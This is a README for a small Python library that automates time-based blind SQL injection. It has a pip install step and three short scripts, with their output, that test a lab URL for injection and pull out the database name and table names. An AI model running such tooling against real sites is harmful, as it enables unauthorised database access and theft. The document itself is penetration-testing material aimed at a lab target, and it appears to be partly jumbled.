Blidner is a small python library to automate time-based blind SQL injection by using a pre defined queries as a functions to automate a rapid PoC development.
Installation
You can install Blinder using the following command:
pip install blinder
Or by downloading the source and importing it manually to your project.
Usage
To use blinder you need to import
Blinder
module then start using the main functions of Blinder.You can use Blinder "with the current version" to do the following:
- Check for time based injection.
- Get database name.
- Get tables names.
#!/usr/bin/pythonThe execution result will be:
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
[email protected]:~/Desktop# python check.pyYou can Get database name using the following code:
True
[email protected]:~/Desktop#
#!/usr/bin/pythonAnd the results will be:
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
[email protected]:~/Desktop# python get-database.pyTo get tables names you can use the following code:
Database name is : db1
[email protected]:~/Desktop#
#!/usr/bin/pythonAnd the results will be:
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
[email protected]:~/Desktop# python get-tables.py
blogs
notes
[email protected]:~/Desktop#
TODO
A lot of features should be added soon like:
- the ability of adding customized query
- test injection points based on burp request
- extract tables/columns data